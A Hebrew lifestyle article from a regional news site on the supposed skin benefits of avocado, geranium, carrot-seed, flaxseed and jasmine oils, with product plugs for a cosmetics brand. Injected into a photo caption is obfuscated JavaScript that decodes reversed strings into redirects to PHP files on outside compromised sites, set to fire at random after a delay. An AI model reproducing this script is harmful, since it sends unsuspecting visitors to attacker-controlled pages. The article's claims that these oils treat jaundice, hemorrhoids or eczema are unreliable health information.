fbpx
[shortcode-weather-atlas city_selector=1178232 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

נפלאות השמן

השמן, שאותו מצאו החשמונאים בפך קטן בבית המקדש בכמות קטנה שהספיקה בסופו של דבר לשמונה ימים, עבר ברבות השנים גלגולים רבים, כשהאדם למד להפיק אותו מצמחים, פרחים ועלים * אלונה שכטר, בעלת מותג קוסמטיקה הנושא את שמה, מפרטת את סוגי השמנים שממש כדאי להוסיף אותם לשגרת הטיפוח
יעיל בטיפול בבעיות עור רבות. שמן אבוקדו | צילום: shutterstock
יעיל בטיפול בבעיות עור רבות. שמן אבוקדו | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

שמנים שמקורם מהטבע מכילים סוגים רבים של ויטמינים ומינרלים החיוניים לגוף האדם, ושימוש בהם כבר נעשה לפני אלפי שנים בתרבויות שונות לטיפול ביופי ובבריאות. השמנים הטהורים מופקים מפרחים, עצים, עשבים, ירקות, פירות שרף ועלים. אילו שמנים מוגדרים כשמני-על ומה הם תועלותיהם? אלונה שכטר, העומדת בראש מותג קוסמטיקה, עם כל המידע הנחוץ למריחה נכונה על עור הפנים והגוף.

השמנים האתריים הם בעצם היחידים החודרים היטב לעור, נספגים למחזור הדם, מסייעים בהסרת תאים מתים ובהגמשת העור וחידושו, והם הוכחו לאורך ההיסטוריה כבעלי יכולות ריפוי גבוהות וזאת בשל הריכוז הגבוה של הצמח הנמצא בהם. תועלות אלו הפכו סוגי שמנים רבים למרכיב מרכזי ומבוקש בתעשיית הקוסמטיקה. השמנים האיכותיים ביותר, שקיבלו מעמד של שמני-על הם שמן האבוקדו, שמן הגרניום, שמן זרעי גזר, שמן זרעי פשתן ושמן יסמין.

שמן אבוקדו

אמנם שמן האבוקדו ידוע בעיקר בשימושים שלו בבישול, אך הוא תורם רבות גם לטיפול בעור הפנים והגוף.

שמן האבוקדו מכיל כמות רבה של ויטמינים, חומצות, מינרלים טבעיים ונוגדי חמצון בריאים, ביניהם חומצות שומן אומגה 3, ויטמינים A, D ו-E. השמן מכיל אשלגן וחומרים רבים אחרים המוסיפים הזנה ולחות לעור. שמן אבוקדו יעיל רבות לטיפול בבעיות כמו פסוריאזיס ואקזמות בעור. בעזרת נוגדי החמצון והוויטמינים שמן האבוקדו עשוי לסייע בריפוי עור יבש, מגורה ומתקלף הקשור למחלות עור אלו. בנוסף, הוא מונע ומטפל בבעיות אקנה – השמן יכול לשמור על לחות העור מבלי להשאיר שאריות שמנוניות ובכך עשוי להפחית את הסיכון לפצעים. בנוסף, יש לו השפעות אנטי דלקתיות, שמסייעות בהפחתת אדמומיות ודלקות. מבחינת אנטי אייג'ינג, מחקרים הראו כי צריכת שומנים בריאים, כמו אלו הנמצאים באבוקדו, עוזרים לשמור על גמישות העור ובכך למנוע ולעכב את סימני ההזדקנות.

שמן ויטמינים מעולה לעור הפנים להפחתת קמטוטים של אלונה שכטר. מכיל ארבעה סוגי שמנים. 200 שקלים | צילום: אורי גרון
שמן ויטמינים מעולה לעור הפנים להפחתת קמטוטים של אלונה שכטר. מכיל ארבעה סוגי שמנים. 200 שקלים | צילום: אורי גרון

שמן גרניום

שמן גרניום מופק על ידי זיקוק טהור של עלי הצמח והוא משמש לטיפול במצבים בריאותיים שונים. הצמח גדל באזורים רבים ובעל כמה זנים, למשל: הזן בעל הפרח הוורוד עם ניחוח רענן ופרחוני. כל זן שונה בריחו, אך כמעט זהה מבחינת ההרכב, היתרונות והשימושים. שמן גרניום נמצא בשימוש נרחב כמרכיב בבשמים ובמוצרי טיפוח וקוסמטיקה. השמן משמש גם בארומתרפיה לטיפול במספר מצבים בריאותיים. לשמן תכונות נוגדות חמצון, אנטי-בקטריאליות, אנטי דלקתיות ויתרונותיו הרבים יעילים לטיפול בבעיות אקנה, דרמטיטיס ומצבי עור דלקתיים. כמו כן, הגרניום ידוע כמעקב את תהליך הזדקנות העור, תורם להסרת כתמי עור, יעיל בטיפול בכוויות, דלקות העור, פטרת, צהבת וטחורים.

שמן הידרופילי של אלונה שכטר. מכיל חמישה סוגי שמנים. 100 שקלים ה| צילום: אורי גרון
שמן הידרופילי של אלונה שכטר. מכיל חמישה סוגי שמנים. 100 שקלים | צילום: אורי גרון

שמן זרעי גזר

שמן זרעי גזר מופק באמצעות זיקוק אדים של זרעי הצמח. בקוסמטיקה השמן יעיל בטיפולי אנטי אייג'ינג ובעיות עור. לשמן זרעי גזר תכונות אנטי-בקטריאליות, אנטי-פטרייתיות, אנטי דלקתיות ונוגדות חמצון. הוא יעיל להרגעת העור בכלל ולהרגעת עור הקרקפת בפרט. השמן מכיל קרוטן, שמחזק ציפורניים ואת שורש השערה וכן מזין את העור. הוא ידוע גם כמעכב סימני הזדקנות ומטפל בעור יבש ופגום. בנוסף, השמן עוזר להפחתת לחץ, מתח ועייפות.

שמן גוף ארומטי של אלונה שכטר. מכיל שבעה סוגי שמנים  לריכוך, הזנה ושמירה על העור. 100 שקלים | צילום: אורי גרון
שמן גוף ארומטי של אלונה שכטר. מכיל שבעה סוגי שמנים  לריכוך, הזנה ושמירה על העור. 100 שקלים | צילום: אורי גרון

שמן זרעי פשתן

זרעי פשתן ידועים ביתרונות הבריאותיים הרבים שלהם, הן בבישול והן בטיפוח העור. הם מכילים כמות גדולה של חלבון וסיבים, ובכך מפחיתים תיאבון ומסייעים בשליטה על המשקל. שמן פשתן עשיר באומגה 3 אף יותר מאגוזי מלך. הוא מזין את העור באופן אינטנסיבי, מגן עליו מפני רדיקלים חופשיים, שומר על חיוניותו ומומלץ לטיפול במצבים של עור בעייתי. בנוסף, השמן תורם רבות לשמירת על האלסטיות והגמישות של העור, מה שיכול לסייע גם נגד סימני מתיחה. שמן הפשתן מסייע גם לשמירה על גמישות וחיוניות השיער, שומר עליו בתהליכי ייבוש וצביעה וכן מנזקי מזג אוויר ופיצול קצוות.

שמן הזנה לשיער של אלונה שכטר. מכיל 10 סוגי שמנים. 110 שקלים | צילום: אורי גרון
שמן הזנה לשיער של אלונה שכטר. מכיל 10 סוגי שמנים. 110 שקלים | צילום: אורי גרון

שמן יסמין

שמן יקר מאוד, שלא רק מריח טוב, אלא גם ידוע כמרגיע וכתורם רבות בתחום הקוסמטיקה. השמן מעולה לפתרון בעיות של עור רגיש ומגורה. הוא בעל כושר חיטוי מעולה ומשמש כסוכן אנטי דלקתי. כמו כן הוא משפר את גמישות העור ומפחית סימני מתיחה. לשמן יסמין יכולת להאיץ את חידוש תאי העור, מעולה לטיפול בעור מזדקן ויבש ובקמטים ואף לטיפול בבעיות עור כדוגמת דרמטיטיס ופצעי אקנה.

את המוצרים של אלונה שכטר ניתן להשיג באתר החברה

 

נהדר ולא יקר

מותג הטיפוח Crema השיק סדרת טיפוח חדשה לגוף בשם RESTART, הכוללת קרם גוף במרקם נעים ולא דביק בכמה ניחוחות, 25 שקלים ל-500 מ"ל; שמן גוף המועשר בקומפלקס של שמנים טבעיים: שקדים, זרעי ענבים, חוחובה ואבוקדו, לשמירה על גמישות ורכות קטיפתית של העור, 25 שקלים ל-150 מ"ל; תרסיס גוף מבושם בשני ניחוחות: בריח ורד ווניל ובריח נרולי ומגנוליה, 40 שקלים ל-260 מ"ל. ברשתות השיווק והפארם.

סדרת RESTART של CREMA | צילום: טל אזולאי
סדרת RESTART של CREMA | צילום: טל אזולאי

עוד חידושים, חדשים ומבצעים בסל של מיכל – כאן

בקרו אותנו גם בפייסבוק: הד הקריות

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות